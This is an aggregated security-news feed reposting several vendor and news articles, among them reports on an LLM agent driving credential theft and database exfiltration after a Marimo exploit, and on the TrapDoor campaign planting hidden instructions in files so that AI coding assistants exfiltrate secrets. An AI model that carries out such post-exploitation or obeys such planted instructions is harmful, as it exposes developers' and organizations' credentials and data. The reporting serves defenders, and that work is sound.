Cloudy Journey

Friday, May 29, 2026

Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection

As threats become more coordinated and faster to execute, endpoint protection has become the proving ground for modern defense. For the seventh consecutive time, Microsoft has been named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. We believe this reflects both the strength of our technology, and the trust customers place in Microsoft Defender.

Microsoft Defender delivers industry-leading Endpoint Detection and Response (EDR), powered by global threat intelligence and built for the scale and speed of today’s attacks. For many of our customers, Defender’s endpoint capabilities are the foundation for a coordinated system of defense that spans endpoints, identities, email, apps, cloud, and data.

Bringing these signals together changes what’s possible. It enables earlier detection, stronger prevention, and capabilities like predictive shielding that help stop attacks before they spread. This is the shift underway in security: from isolated tools to a connected system that can see across the environment, understand what’s changing, and take action in real time. It’s what makes the next generation of AI-driven, agentic security possible and helps defenders stay ahead of threats, not just respond to them.

Get started with Microsoft Defender for Endpoint

Sustained innovation to stay ahead of changing threats

Over the past year, Microsoft has introduced key advancements to endpoint protection that have empowered defenders to stay ahead of evolving cyberthreats, including:

Proactive defense during attacks: Attack disruption now expands autonomous protection to predicting and blocking an adversary’s next move during active attacks. It acts just in time to harden against some of the most common attacker tactics, such as group policy objects (GPOs), Safeboot, and identity compromise, to stop lateral movement and defend dynamically.

Custom telemetry: With new custom data collection capabilities, Defender makes it easy for security teams to collect specialized data directly within the Defender portal. It allows organizations to extend their endpoint telemetry beyond the 200+ default signals to support tailored detections and advanced hunting scenarios, such as AMSI for hunting over script content and Kerberos for auth-based and network attacks.

Simplified onboarding: To help security teams onboard simply and securely, we’ve built new Defender deployment tools for Windows and Linux, which handle the entire process for you. Just download a single package and it will dynamically adapt to the operating system, take care of prerequisites, and install the latest version of Defender available as needed for older devices that don’t have it already built in. The Defender deployment tools eliminate friction, automate tricky steps, and provide predictability throughout the onboarding journey.

Sovereign-ready protection: Defender enables customers to meet data storage and privacy needs while operating under public, sovereign, hybrid, or disconnected models. Its multi‑tenant architecture enables organizations to balance centralized security visibility with localized control over their data, reflecting a shift from basic compliance to operational governance.

End-to-end security for local AI agents: Microsoft announced agentic endpoint security as a part of A365 to discover, govern, and block AI agents such as OpenClaw and previously unseen applications running locally on endpoints.

Innovations such as these represent the continued commitment to drive the next wave of innovation. Stay tuned for more exciting advancements at Microsoft Build on June 2^nd.

Disrupt ransomware on any platform with Microsoft Defender for Endpoint

Learn more

If you’re not yet taking advantage of Microsoft’s leading endpoint security solution, visit Microsoft Defender for Endpoint and start a free trial today to evaluate our leading endpoint protection platform.

Are you a regular user of Microsoft Defender for Endpoint? Share your insights on Microsoft Defender for Endpoint and get rewarded with a $25 gift card on Gartner Peer Insights™.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Gartner, Magic Quadrant for Endpoint Protection, Deepak Mishra, Evgeny Mirolyubov, Nikul Patel, 26 May 2026.

Gartner is a registered trademark and service mark and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection appeared first on Microsoft Security Blog.

from Microsoft Security Blog https://ift.tt/3dz4XhH
via IFTTT

Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit

An unknown threat actor has been observed using a large language model (LLM) agent to conduct post-compromise actions after obtaining initial access following the exploitation of a publicly-accessible Marimo network using a recently disclosed vulnerability.

"The attacker compromised an internet-reachable Marimo notebook via CVE-2026-39987, extracted two cloud credentials from the compromised host, replayed them through a fanned-out egress pool to retrieve an SSH private key from AWS Secrets Manager, and used that key to drive eight short SSH sessions against a downstream SSH bastion server," Sysdig said.

"The bastion phase exfiltrated the schema and full contents of an internal PostgreSQL database in under two minutes."

CVE-2026-39987 refers to a critical pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including 0.20.4. It allows an unauthenticated attacker to execute arbitrary system commands. The issue was addressed in version 0.23.0, released last month.

The security defect has since come under active exploitation, with threat actors using it to initiate manual reconnaissance against honeypot systems and attempt to harvest sensitive data.

The latest activity documented by Sysdig sticks to the same pattern, the primary difference being that an LLM agent was used to drive the post-exploitation activity. The incident, per the cloud security firm, was recorded on May 10, 2026, with the attacker gathering credentials from the environment and then using the harvested AWS access key to perform API calls against AWS Secrets Manager and retrieve an SSH private key.

Minutes later, the threat actor is said to have carried out the first SSH authentication on the SSH bastion server using the retrieved key, followed by launching eight parallel SSH sessions against the downstream server to siphon an internal PostgreSQL database. The end-to-end attack chain lasted a little over an hour.

Sysdig said it uncovered four indicators that an LLM agent was behind the activity. First, the attacker improvised a database dump without any prior knowledge of the schema. Second, a Chinese-language planning comment, "看还能做什么" translating to "See what else we can do" leaked directly in the command stream when executing a credential search.

"The database hostname was opaque, with no application identifier on disk and no schema dump pre-staged, yet the chain still landed on a credential table within minutes," Sysdig said. "The attacker no longer needs to see your environment to operate inside it."

The third sign is that every command is designed for machine consumption, with each command separated by a "---" delimiter, along with bounded output captures, disabling the "less" command, and discarding the error stream (stderr) to minimize noise.

Lastly, the value handoffs are obtained from prior tool output. In other words, the manner in which certain values, say, database passwords, were extracted implies an AI agent feeding its own previous output -- running a cat command of the "~/.pgpass" file -- into the next action.

In another instance, a cat command to print the contents of a specific file ("cat ~/.ssh/id_ed25519") is preceded by an ls ("list") command that passes the same file pattern as input ("ls -la ~/.ssh/id_ed25519*") to confirm that the SSH Key exists.

"When a scripted operator builds a per-target playbook and reuses it, the bar to adding a new target is engineering time," Sysdig concluded. "However, an agent operator carries general priors about a class of applications and composes the chain live to best fit its target. Here, the bar becomes inference budget, not playbook authorship."

"The defender-relevant property of an agent-in-the-loop is adaptiveness. A scripted attacker hits a missing file, an unexpected schema, or an authentication failure and either aborts or falls through to a hard-coded fallback. An agent reads the surprise, decides what to try next, and keeps going."

To counter this threat, it's recommended that users update to the latest version of Marimo, audit environments for any publicly-accessible instances, and rotate credentials, API keys, and SSH keys.

from The Hacker News https://ift.tt/L19fnNz
via IFTTT

The Good, the Bad and the Ugly in Cybersecurity – Week 22

The Good | Authorities Dismantle Malicious Hosting Network & Sentence Oregon State Cyberattacker

Web hosting firm, Stark Industries, was the subject of scrutiny this week from financial crime investigators in the Netherlands (FIOD). Founded just before the 2022 invasion of Ukraine, the firm had deep ties to Russian and Belarusian entities all sanctioned by the EU. Dutch authorities arrested two indviduals and seized 800 servers across multiple data centers that actively enabled Russian-based cyberattacks, disinformation operations, and widespread interference campaigns.

After being sanctioned in May of last year, Stark Industries shifted their operations to a front company named WorkTitans B.V., which provided hosting services under a new brand, THE.Hosting. This entity allegedly supported the pro-Russian hacktivist syndicate NoName057(16) in executing distributed denial-of-service (DDoS) attacks and indirectly supplied economic resources to restricted organizations.

Collaboration between the DoJ and Romanian law enforcement has resulted in a Romanian national receiving a sentence of 56 months in federal prison for breaching an Oregon state government network.

Catalin Dragomir, operating under the alias “inthematrixl,” pled guilty to aggravated identity theft and obtaining information from a protected computer. Court documents reveal that the 46-year-old gained unauthorized access to the Oregon Department of Emergency Management in June 2021. He subsequently sold this network access to an outside buyer, providing stolen personally identifiable information.

Beyond the Oregon breach, Dragomir also compromised nearly a dozen other victims across the U.S., with total losses exceeding $250,000. Dragomir currently faces five years for computer intrusion, a mandatory two-year term for identity theft, and three years under supervised release. The court has additionally ordered the forfeiture of his cryptocurrency assets.

The Bad | Silent Ransom Group Attackers Dispatch Operatives for In-Person Data Extortion

In-person data theft schemes are on the rise again. In an urgent flash report, the FBI warns that Silent Ransom Group (SRG) is executing social engineering operations against U.S. legal and financial institutions directly at the site of the victim.

Splitting from the Conti syndicate in early 2022, SRG (aka UNC3753, Luna Moth, and Chatty Spider) has historically relied on targeted callback phishing. Lately, the group has escalated its tactics beyond network compromises to include unauthorized physical access.

The attack chain begins with the threat actors posing as internal IT support personnel. Using typosquatted helpdesk domains, the attackers deploy phishing emails or phone calls urging employees to contact them for technical assistance.

Once an employee engages, the attackers attempt to establish a remote desktop session to exfiltrate data. If remote access fails, SRG deliberately escalates the intrusion by sending an operative directly to the victim’s physical location. These unidentified individuals attempt to gain building access to manually insert USB flash drives or external hard drives into the targeted company computers.

Having obtained information, the extortion gang targets the victimized legal and financial organizations. The attackers send ransom demands threatening to publish the stolen proprietary data on leak sites, while simultaneously harassing both employees and external clients by phone to force financial negotiations.

This recent escalation builds upon previous advisories, making it critical for organizations to train staff on how to thoroughly verify digital helpdesk requests and immediately report threats to physical security.

The Ugly | TrapDoor Campaign Launch Cross-Ecosystem Supply Chain Attacks to Steal Credentials

Security researchers have uncovered TrapDoor, a coordinated software supply chain campaign actively distributing credential-stealing malware across npm, PyPI, and Crates.io.

Starting on May 22, 2026, threat actors deployed over 34 malicious packages spanning nearly 400 versions to specifically target developers within the cryptocurrency, decentralized finance, Solana, and AI communities.

Disguised as legitimate local environment and security tooling, TrapDoor works by harvesting a wide range of sensitive developer secrets, SSH keys, cloud credentials, and cryptocurrency wallets.

The operation uses tailored execution methods for each specific registry. Within npm environments, malicious postinstall hooks deploy a shared JavaScript payload that actively validates stolen AWS and GitHub tokens while attempting SSH-based lateral movement.

Rust crates similarly leverage malicious build scripts to search local keystores, encrypting discovered data with a hardcoded XOR key before exfiltrating it to GitHub Gists.

Meanwhile, the Python packages auto-execute during import to download and run remote JavaScript payloads from attacker-controlled domains, granting the operators significant flexibility to modify the malware’s behavior without publishing new registry releases.

TrapDoor playbook showing intended extraction framework of the campaign found in GitHub (Source: Socket)

TrapDoor establishes host persistence utilizing cron jobs, systemd services, and Git hooks. The campaign also targets AI coding assistants by implanting compromised files that contain hidden instructions deliberately designed to trick AI tools into autonomously executing malicious security scans that then discover and exfiltrate local secrets.

Researcher say that threat actors are now actively submitting pull requests containing these poisoned files to major open-source AI projects – an evolving tactic to compromise developer workflows through automated contributor processes and code integrations.

Researchers emphasize that this campaign combines traditional package typosquatting with emerging developer-environment attack vectors. By carefully tailoring package names to mimic legitimate cryptocurrency, AI, and local security workflows, the attackers successfully bypass initial developer scrutiny to execute their multi-ecosystem infiltration. A list of compromised packages can be found here.

from SentinelOne https://ift.tt/VnATQma
via IFTTT

New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks

A previously undocumented threat actor dubbed GREYVIBE has been attributed to ongoing and persistent attacks targeting Ukraine and Ukraine-related entities since at least August 2025.

GREYVIBE, per WithSecure, is assessed to be a Russian-speaking group operating broadly in the Russian time zone, with the activities aligning with Kremlin state interests, specifically when it comes to intelligence gathering efforts aimed at Ukraine in the context of the ongoing Russo-Ukrainian war.

"The group has leveraged multiple attack vectors, including spear-phishing e-mails, fake captcha pages, and fraudulent Ukrainian adult club websites, to deliver malware to a diverse set of victims," WithSecure researcher Mohammad Kazem Hassan Nejad said in an analysis. "Across these campaigns, the group has relied on custom-developed obfuscators, loaders, and malware."

The victimology footprint spans military, government, civilian, and business-related organizations. GREYVIBE, its nation-state-affiliated activity notwithstanding, also shares ties to the broader Russian cybercrime ecosystem through some of its members who are believed to be current or former cybercriminal actors.

In addition, there is evidence indicating that the adversary is relying on generative artificial intelligence (GenAI) and large language models (LLMs) to supercharge its operations. Taken together, WithSecure paints the picture of a "low-to-moderately sophisticated group" that suffers from operational security blunders and employs AI-assisted tooling to augment its malware development efforts.

GREYVIBE has been observed using multiple attack chains against its targets -

PhantomMail, which uses spear-phishing emails to distribute links pointing to malicious ZIP or RAR archives hosted on Google Drive and 4sync that contain JavaScript-based loaders to launch a decoy document, and PhantomRelay, a PowerShell-based remote access trojan (RAT) designed to profile the host and run PowerShell scripts and Windows commands.
PhantomClick, which uses ClickFix-style fake CAPTCHA pages on bogus domains masquerading as Zoom and LAPAS to trick users into running commands that initiate a PhantomRelay infection chain.
PrincessClub, which uses fake Ukrainian adult-club websites to deliver FallSpy on Android and PhantomRelayV1 or LegionRelay on Windows, with subsequent iterations of the lure sites introducing a WebRTC-based live call feature to capture victim audio and video. While FallSpy is an Android spyware capable of harvesting sensitive data from the compromised device, LegionRelay is a lightweight PowerShell-based RAT that supports file enumeration, file exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data exfiltration, and RDP access setup. PhantomRelayV1 is a variant of PhantomRelay with a custom watchdog persistence mechanism.
DroneLink, which uses websites masquerading as charitable foundations supporting the Armed Forces of Ukraine to deliver WireGuard and LegionRelay.
Nebo, which uses a FallSpy sample that mimics a Russian-language login screen, likely in an attempt to deceive Ukrainian military personnel into thinking they were accessing a Russian military terminal.

The variety of delivery vectors and tools used in the attacks likely stems from the use of AI platforms, including Ideogram AI, OpenAI ChatGPT, and Google Gemini, to assist with generating images and developing LegionRelay, as well as obfuscation and loader scripts, backend infrastructure, and post-compromise commands.

The cybersecurity company said GREYVIBE's usage of AI serves multiple advantages, including bridging gaps in technical expertise, accelerating the development lifecycle, and reducing reliance on previously known malware or tools that could aid in attribution efforts.

"If an actor can frequently generate, refactor, or replace components of its operational footprint with AI assistance, traditional clustering methods based on stable technical artifacts may become less reliable over time," Nejad said.

That said, the use of AI has also had the side effect of introducing design flaws into LegionRelay, exposing the malware's backend functionality. This is another sign suggesting GREYVIBE may not be a pure nation-state actor, as sophisticated adversaries are unlikely to make such mistakes.

The hacking group's links to the cybercriminal ecosystem are based on multiple factors -

Possible access to and use of an ISO builder with suspected ties to the TrickBot gang and UAC-0098
Presence of PhantomRelay variants across seemingly unrelated cybercrime activity clusters, such as a Microsoft Teams voice phishing campaign between July 2025 and February 2026, and a KongTuke delivery chain between late February and late March 2026 that used ClickFix to distribute the malware.
The upload of early development and test samples to VirusTotal
Use of internet slang terms like "letsrollboyos," "totallyunsus," and "cuteuwu" as naming conventions for development artifacts.
The deployment of XMRig miner on a small number of LegionRelay-infected machines

"Taken together, we assess with moderate confidence that the group has ties to the broader cybercrime ecosystem, and with low-to-moderate confidence that it involves current or former cybercriminal members," WithSecure said. "The exact nature of their relationship to the Russian state remains unclear, whether such members have been absorbed into a state-backed group, operate independently under state-directed tasking, or have formed a hybrid team."

"The group occupies a grey area between cybercrime and state-affiliated activity, complicating attribution efforts and blurring traditional distinctions between these categories."

from The Hacker News https://ift.tt/SiHA487
via IFTTT

What 2,000 Exposed Vibe-Coded Apps Reveal About the Limits of Most Security Stacks

Shadow AI used to mean employees pasting things they shouldn't into ChatGPT. It now means something bigger: employees building full applications with AI, wiring them into production systems, and publishing them on the open internet. Without Security or IT in the loop.

The artifact moved from a prompt to a product. The risk surface moved with it.

In The Shadow Builders report (get it here), a new category-level investigation covered in May by Axios, WIRED, and VentureBeat, Red Access identified more than 380,000 publicly accessible web assets across the leading vibe-coding platforms.

Roughly 5,000 looked corporate. More than 2,000 of those held sensitive corporate, operational, or personal data - sitting on the open web, deployed without basic access controls, often granting admin access by default to anyone who reached the URL. Six continents. Every industry is examined. No exploitation required.

Inside organizations, passing their audits while these exposures were live.

The new Shadow AI isn't about prompts. It's about products.

Vibe coding - the broader space of AI-driven development platforms where anyone can build a working application by describing what they want - has compressed what used to take engineering teams months into something a non-developer can ship before lunch.

A marketing manager builds a campaign tracker and connects it to the BI tool where the real numbers live. An operations manager builds a vendor-intake form and connects it to the ticketing system. A finance team builds a board-prep dashboard and pulls invoice data into it before Friday. Those applications get connected to sanctioned production systems - CRMs, ERPs, ticketing tools, BI platforms - and frequently published to the open internet, with whatever access controls the builder happened to configure. Often, none.

The people doing this aren't malicious. They are competent employees solving real problems faster than their organization could, doing exactly what the platforms invited them to do. The platforms aren't villains either - they're delivering what their original audience asked for. What hasn't kept pace is the guardrails, technical and behavioral, governing what happens after the build.

This isn't Shadow IT in the old sense. Shadow IT was bounded: when a team bought a Trello account on a corporate card without telling anyone, the data sat inside an unsanctioned SaaS vendor, but identity, audit logs, and a governance surface at least existed. Shadow Builders invert that. The application is custom-built, the data is custom-loaded, the integrations are direct connections to production systems of record, and the artifact is often published on the open internet. The platform underneath may be audited; the application built on it isn't. There is the builder, the platform, and the URL. IT? Mostly not in the room.

Why a mature security stack still misses this

The reflex of a CISO reading the numbers above is to check the stack. EDR is running. DLP is configured. CASB is licensed. Firewall and SSE are in place. Some organizations have added an enterprise browser. Each of those tools is doing what it was designed to do. The category sits in the gaps between them.

EDR sees the browser process, not the build inside it. To an endpoint agent, a Shadow Builder using a vibe-coding platform looks like ordinary, non-malicious browser activity - the same shape of telemetry as someone reading the news. Where modern EDR or an enterprise browser does see deeper, it only does so on devices the organization owns and inside browsers it manages. Personal laptops, contractor machines, BYOD devices, and personal-browser tabs are invisible by definition.

DLP watches enumerated channels. It can flag a user pasting regulated data into a known AI chat. It can't see a vibe-coded application connecting programmatically to a sanctioned BI tool via API, moving data cloud-to-cloud, physically bypassing the endpoint entirely.

CASB was built for Shadow IT - for SaaS vendors with discoverable identities. It can't readily distinguish an unbounded population of custom applications hosted on a vibe-coding platform's subdomains from the platform itself. The whole population tends to register as one approved SaaS vendor.

Firewall and SSE see traffic to the platform's domain but lack the application-as-business-object context. And most SASE/SSE deployments are partial - even the mature ones leave the unmanaged-device problem unsolved.

None of these tools is failing. The category just sits across the gaps the existing architecture leaves between layers, generating fragments of signal that never assemble into a single, governable picture.

Where visibility actually has to live

End-to-end, vibe coding is a web-session event. The build is a browser event. The OAuth grant that ties the new application to a sanctioned enterprise system is a browser event. The data the application is built around moves through the session. The deployment is a browser event - the publish action that turns the build into a live application at a public URL is a click inside the same tab where everything else happened.

Every step happens at the session layer. Not adjacent to it. Inside it.

A control positioned at the session layer, therefore, sees the whole build path - not a fragment of it. The platform used. The corporate systems connected to it, and through what mechanism. The data is moving in and out. The publish event that puts the application on the open internet. Attributable to a specific person and a specific application instance, regardless of which browser was used or which network path the traffic took. And, critically, regardless of whether the device is a corporate-issued laptop or a contractor's personal machine.

What to do this week

Four moves. None of them is a technology purchase.

Start with discovery. Ask employees directly what they've built. Most Shadow Builders are doing useful work and aren't hiding anything; the framing matters. A workforce-wide prompt - if you've built a tool using an AI development platform, please tell us about it. We're not auditing. We're inventorying - gets further on the first pass than a policy memo or a tooling deployment.

Then map. For each application surfaced, capture which corporate systems it's connected to, how (OAuth, API key, manual upload - different audit trails), and whether it's publicly reachable. Public reachability is the most actionable signal in the short term.

Establish a sanctioned path. Give Shadow Builders somewhere to tell you. Name the approved platforms, define acceptable data categories, and set a minimum authentication standard. Lower-friction than the alternative, which is them not telling you at all.

And then accept that the work isn't a one-time inventory. Vibe-coded applications keep getting created; the picture you build this month will be incomplete next month. The mature posture is continuous discovery at the layer where the activity actually happens.

The category will keep maturing. Platforms will keep recalibrating defaults. None of those adaptations is finished. The exposure exists in most enterprises right now.

Red Access is the agentless, session-layer security platform built for exactly this - SSE-grade visibility and governance at the session itself, across any browser, any device, including unmanaged ones. Deployable in hours. Request your free audit.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/IgUfTrH
via IFTTT

Malicious Sicoob NuGet Steals Banking Credentials as npm Packages Target Cloud Secrets

Cybersecurity researchers have discovered a malicious NuGet package that masquerades as a C# software development kit for Sicoob, one of Brazil's largest cooperative financial systems, to siphon client IDs and PFX certificates.

According to Socket, versions 2.0.0 through 2.0.4 of "Sicoob.Sdk" contain functionality to exfiltrate sensitive information, including PFX certificates that are used to authenticate businesses with the Sicoob banking network in order to automate banking operations, such as processing instant payments and generating dynamic Pix QR codes. The package is estimated to have been downloaded nearly 500 times.

"When a developer instantiates SicoobClient with a client ID, a PFX file path, and a PFX password, the package reads the PFX file from disk, Base64-encodes its contents, and sends the supplied client ID, PFX password, and encoded PFX data to a hardcoded third-party Sentry endpoint," security researcher Kirill Boychenko said.

In addition, the package is designed to capture raw Boleto API responses via a separate Sentry path. Boleto is a popular cash payment method in Brazil for making online and offline purchases. This can potentially expose sensitive transaction details, payment status, amounts, due dates, identifiers, and payer or payee data.

As a result, the stolen data could open the door to severe risks, as it can be abused by the threat actor to impersonate the victim's Sicoob banking API integration, Socket added. Following responsible disclosure, the package has been blocked by NuGet. The profile behind the package, named "sicoob," has also listed 11 other NuGet packages that have collectively racked up about 6,000 downloads.

The application security company also said the package was surfaced by Google Search AI Mode as a legitimate C# library for interacting with Sicoob banking APIs, thereby amplifying the malicious package to unsuspecting developers who may be searching for it.

Another important aspect of the attack is the source-to-package mismatch between the linked GitHub repository and the artifact distributed via NuGet. It's suspected that the GitHub repository is designed to lend a veneer of legitimacy to the operation by keeping it clean, while the malicious data-stealing functionality is introduced only in the package uploaded to the registry.

What's more, the compromise of Sicoob API authentication material can also pose indirect risks to end users, as it could leak downstream financial data or enable payment abuse.

Organizations that have installed "Sicoob.Sdk" are recommended to immediately remove the package, treat PFX material as compromised, replace exposed PFX certificates, rotate PFX passwords, and change or disable affected client IDs where applicable. It's also advised to audit Sicoob authentication and API logs for signs of unusual activity.

The development coincides with the discovery of 14 malicious npm packages that typosquat well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from the host environment using a purpose-built credential harvester that's launched through a preinstall hook.

Per the Microsoft Defender Security Research Team, the packages were published by a single threat actor named "vpmdhaj" ("a39155771@gmail.com") on May 28, 2026. The names of the packages are below -

@vpmdhaj/devops-tools
@vpmdhaj/elastic-helper
@vpmdhaj/opensearch-setup
@vpmdhaj/search-setup
app-config-utility
elastic-opensearch-helper
env-config-manager
opensearch-config-utility
opensearch-security-scanner
opensearch-setup
opensearch-setup-tool
search-cluster-setup
search-engine-setup
vpmdhaj-opensearch-setup

Over the past few days, various software supply chain attack campaigns targeting open-source ecosystems have been reported -

164 malicious npm packages across five scoped namespaces containing a postinstall payload that downloads second-stage JavaScript, spawns it as a detached process, and sends the victim's environment variables ("process.env") to "oob.moika[.]tech/report."
141 malicious npm packages published between May 7 and 27, 2026, that abuse npm as free static hosting for an ad-monetized web proxy targeting students, serving popunder ads to those who land these pages through search results or shared links.
A malicious npm package called "forge-jsxy" that's capable of keylogging, clipboard monitoring, .env scanning, shell history exfiltration, host inventory, remote filesystem access, screenshot capture, and cryptocurrency wallet scanning. "Forge-jsxy" is assessed to be a continuation of the "forge-jsx" campaign that came to light late last month.
176 malicious npm packages that employ dependency confusion by using a high version number ("99.99.99") to distribute a postinstall script with capabilities to fingerprint the host and download a platform-specific JavaScript payload, which then conducts additional reconnaissance, exfiltrates credentials and other valuable developer secrets, and downloads and runs a second-stage binary.

In a newly published report, Sonatype said threat actors have outgrown classic typosquatting techniques, moving beyond obvious misspellings to using names that appear convincing in legitimate developer workflows so as to steal data and drop malicious payloads. This, in turn, turns a routine install step into a risk-prone pathway for reconnaissance, credential theft, and follow-on compromise.

Popular brandjacking techniques include prefix or suffix addition, dependency confusion, version mimicry, embedded target terms, altered scopes or namespaces, and names that resemble the function of a legitimate package.

"'Typosquatting' is now too narrow a label for what this analysis captures," the supply chain security company said. "The broader pattern is manufactured legitimacy: attackers designing package names to look plausible, useful, and operationally routine inside modern software ecosystems."

These incidents have also unfolded against a series of software supply chain compromises that have been linked to TeamPCP (aka Replicating Marauder and UNC6780), which has become a force to be reckoned with by poisoning popular developer tooling across npm, PyPI, Docker Hub, and Packagist in a worm-like fashion.

"Replicating Marauder was not just inserting malicious code into packages, but also exploiting automation, inherited trust, and ordinary CI/CD workflows to push compromise further downstream," BlueVoyant researcher Michael Warren said.

"This was the point where the campaign most clearly demonstrated that one poisoned dependency or container image could trigger compromise in an unrelated organization's release pipeline. The tactical shift turned isolated software poisoning into a reproducible method for victim-to-victim expansion."

from The Hacker News https://ift.tt/UuG2S4E
via IFTTT

Thursday, May 28, 2026

Your EHR is only as resilient as the infrastructure beneath it

There is a question I get from healthcare IT leaders more often than almost any other: how do we justify the cost of our infrastructure when no one in the boardroom understands what it does?

My answer is always the same: they understand it the moment something goes wrong.

That is the reality of healthcare IT. We operate in near invisibility when things work and under a microscope when they do not. And nothing makes things go wrong faster, at greater scale, and with more direct consequence to patients, than the wrong decision about how to deliver your EHR.

I have spent a long time thinking about what separates health systems that recover from major disruptions quickly from those that spend days, weeks or months, clawing back to normal operations. The answer is almost always architectural. Not a vendor decision, not a budget decision, not a staffing decision. An architectural one.

“Choosing the wrong delivery model can mean higher costs, more downtime in a crisis, and frustrated end-users; choosing the right model can improve uptime, contain cyber risks, and save millions of dollars over time.” – Envision IT, Epic Healthcare Delivery Models

The stakes have changed

Healthcare has always been a high-stakes environment for IT. But the threat landscape and the regulatory environment have converged in a way that makes EHR delivery architecture more consequential than it has ever been. Ransomware attacks are not a theoretical risk. Scripps Health lost four weeks of EHR access and $112.7 million in a single event. The wave of attacks targeting our sector is not slowing down.

At the same time, proposed HIPAA updates would require health systems to restore EHR access within 72 hours of a cyber incident. That is not a standard most thick-client environments can meet. I have watched organizations do the math after an event and realize—sometimes for the first time—what their architecture actually costs them when it fails.

That moment of recognition should happen before the incident, not after.

What the CrowdStrike event taught us

The 2024 CrowdStrike outage was painful for a lot of organizations, and it was clarifying for all of us. The recovery data tells a story that every CIO in healthcare should have in front of their leadership team.

“Three engineers recovered 18,000 thin client VDI desktops in four hours. At the same organization, a team of 150 IT staff needed nearly four days to recover 2,500 Windows PCs.” — Envision IT, Epic Healthcare Delivery Models

Read that again. Three people. Four hours. Eighteen thousand endpoints.

That is not a coincidence. That is architecture. When your EHR and clinical applications are delivered from a centralized platform through a single master VDI image, recovery simply means reverting that image. It means a reboot, not a rebuild. The contrast with decentralized, locally installed environments, where every affected device must be touched individually, should be a defining data point in every EHR delivery conversation your team is having right now.

This is a business decision, not a technical one

I want to be direct about something, because I think we do ourselves a disservice when we frame EHR delivery as an infrastructure question. It is not.

Every day your EHR is inaccessible, the patient safety clock starts.You lose revenue. Canceled procedures, delayed billing, ambulance diversion, and the cost of paper fallback workflows. These are not abstractions. The moment a clinician cannot reach Epic, the financial and care impacts start to compound, and your path back to normalcy gets farther away.

The architecture decision you make about EHR delivery shapes your organization’s ability to recover when things go wrong, your security posture, your total cost of ownership, and your ability to adapt as care models and regulations continue to evolve.

That is a strategic conversation. It belongs in the boardroom, not just the server room.

Independent research backs this up. Thin client VDI environments deliver 20 to 40 percent lower total cost of ownership than full PC deployments when you account for hardware, energy, and support costs over time. IT staffing ratios shift from roughly one admin per 60 endpoints to one per 500 to 1,000. And because no patient data lives on the device itself, a lost or stolen thin client is a nuisance, not a breach.

“Broad architectural decisions often have impacts that last for years. These choices can either limit or enable the system’s ability to quickly adapt to evolving market demands, regulatory requirements, or technological advancements.” — Envision IT, Epic Healthcare Delivery Models

What I tell other IT leaders

When a colleague asks me where to start, I tell them to stop framing EHR delivery as a technology problem and start framing it as a business continuity and risk management problem. Then take it to your CFO, your CMO, and your board with that framing, using a governance framework to align disaster preparedness activities and bring operations into active tabletop business resiliency exercises.

Show them the recovery data. Model the TCO difference. Walk them through what a 72-hour HIPAA restoration requirement means for your current architecture. The conversation changes when the numbers are on the table.

We have a responsibility to the patients and clinicians who depend on these systems every single day. That responsibility does not end at the edge of the server room. It extends to every endpoint, every workflow, and every decision we make about how those systems are delivered.

The architecture decision is the most important one you will make. Make it with intention.

For an independent, data-driven comparison of EHR delivery models across cost, risk, flexibility, and operational impact, read the Envision IT whitepaper: Epic Healthcare Delivery Models.

from Citrix Blogs https://ift.tt/gFmC3iH
via IFTTT

Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code

A critical security vulnerability has been disclosed in Gogs, a popular open-source self-hosted Git service, that allows an authenticated user to execute arbitrary code under certain conditions.

The security flaw, per Rapid7, is rated 9.4 on the CVSS scoring system. It does not have a CVE identifier.

"The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the --exec flag into git rebase during the 'Rebase before merging' merge operation," security researcher Jonah Burgess said.

Rebasing is a Git action that's used to take a sequence of commits from one feature branch and replay them on top of another base branch to create a linear project history. While "git rebase" solves the same problem as "git merge" -- i.e., integrating changes from one branch into another -- the former rewrites the project history by creating new commits for each commit in the original branch.

The "git rebase" action also accepts as an argument a shell command via an --exec flag that's executed after each commit is replayed. A notable aspect of the vulnerability is that it does not require admin privileges or interaction with other users. To pull off the attack, all an unauthenticated threat actor has to do is create an account and repository on any default-configured instance.

"Any registered user who creates a repo is automatically its owner," Burgess said. "From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user."

In an alternative scenario, a user with write access to a repository where rebase is already enabled can exploit the flaw directly to obtain code execution. On Gogs instances where repository creation is restricted, an attacker is required to have write access to any repository that has rebase merging enabled.

VIDEO

As of writing, the vulnerability remains unpatched despite it being reported to the maintainer on March 17, 2026. Successful exploitation of the bug could grant an attacker the ability to breach the server, access every repository on the instance, dump credentials, move to other network-accessible systems, and tamper with any hosted repository's code.

What's more, it can result in a cross-tenant data breach, allowing the attacker to read other users' private repositories hosted on the same shared server. According to Rapid7, the flaw impacts all supported platforms, such as Windows, Linux, and macOS.

There are an estimated 1,141 internet-facing Gogs instances. However, the actual figure is expected to be higher, given that most deployments are placed behind VPNs or internal networks.

In the absence of a patch, the following recommendations are outlined -

Restrict user registration (DISABLE_REGISTRATION = true in app.ini) to prevent untrusted users from creating accounts
